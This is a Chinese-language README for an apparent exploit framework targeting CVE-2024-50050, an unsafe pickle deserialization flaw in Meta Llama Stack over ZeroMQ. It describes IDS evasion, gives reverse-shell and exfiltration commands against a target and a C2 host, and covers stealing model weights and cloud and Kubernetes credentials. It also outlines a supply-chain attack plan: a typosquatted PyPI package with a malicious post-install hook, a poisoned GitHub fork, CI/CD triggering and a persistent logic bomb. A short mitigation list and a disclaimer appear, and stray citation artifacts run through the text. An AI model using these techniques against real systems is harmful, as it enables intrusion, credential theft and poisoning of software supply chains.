LlamaStack-RCE: Deterministic Supply Chain Exploitation & Hardening Framework [CVE-2024-50050] Focus on AI Security Research AI-SupplyChain-Poisoning: Advanced PVM Opcode Manipulation & ZeroMQ Injection Lab
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE 是一个针对 Meta Llama Stack 中 CVE-2024-50050 关键远程代码执行(RCE)漏洞的高保真模拟与利用框架。该漏洞源于 Python 推理 API 中的不安全反序列化,具体是在 ZeroMQ (0MQ) 传输层上使用 pickle 模块。
此仓库提供了完整的攻击链,从上游供应链投毒到下游执行及模型权重窃取。
漏洞核心利用 Pickle 虚拟机 (PVM)。通过使用 GLOBAL 操作码,我们能强制 PVM 在 unpickling 过程中导入任意可用 Python 模块并执行任意函数。
攻击向量: ZeroMQ Socket -> 原始字节流 -> pickle.loads() -> RCE。
为绕过传统的基于签名的 IDS(Snort/Suricata),框架实现了多态编码:
/bin/bash 或 os.system 这样的字面字符串。pickle 载荷分割成多个 ZeroMQ 帧,以规避基于流量量的异常检测。该框架模拟了整体性的供应链武器化:
.
[cite_start]├── lab_validator.py # 7 阶段自动化验证套件 [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # 主利用框架 [cite: 138, 206]
[cite_start]├── server.py # 易受攻击的 Llama Stack 模拟 [cite: 112, 150]
[cite_start]├── setup.py # 武器化的供应链安装程序 [cite: 110, 206]
[cite_start]├── post_exploit.py # 数据收割与横向移动 [cite: 210, 264]
[cite_start]└── evasion_library.py # 12+ 高级规避方法 [cite: 264]
[cite_start]python lab_validator.py # 目标:100% 通过率 [cite: 208, 209]
nc -lvnp 4444
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
成功利用可获得对 AI 基础设施的绝对控制:
.safetensors 模型权重(价值 1000 万至 1 亿美元以上)。/proc/self/environ 中提取 AWS/GCP 密钥和 K8s 配置。为缓解 CVE-2024-50050,必须应用以下绝对规则:
pickle.loads() 替换为 safetensors.torch.load_file() 或使用严格模式的 msgpack。ZMQ_CURVE,并且绝不绑定到 0.0.0.0。gVisor 或 Kata Containers 中运行 AI 进程,以防止 RCE 容器逃逸。法律声明: 未经事先书面授权,使用此框架攻击目标是非法的。本框架仅供教育和授权的渗透测试使用。作者(Sastra_Adi_Wiguna)对滥用行为不承担任何责任。
分类文档:PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 确定性状态:生产就绪 (98/100)
| 阶段 | 策略 | 技术实现 |
|---|
| I: 上游 | 域名抢注 | 在 PyPI 上注册 metalama-stack,并在 setup.py 中设置恶意的 PostInstallCommand。 |
| II: 分发 | 投毒分支 | 在 GitHub 上创建高性能的 Llama Stack 分支,在 connection.py 中植入“隐藏的 Pickle 解释器”。 |
| III: 执行 | CI/CD 触发器 | 在目标的 Jenkins/GitHub Actions 环境中通过 pip install 自动执行。 |
| IV: 持久化 | 逻辑炸弹 | 多阶段后台潜伏器,用于长期 C2 访问和模型窃取。 |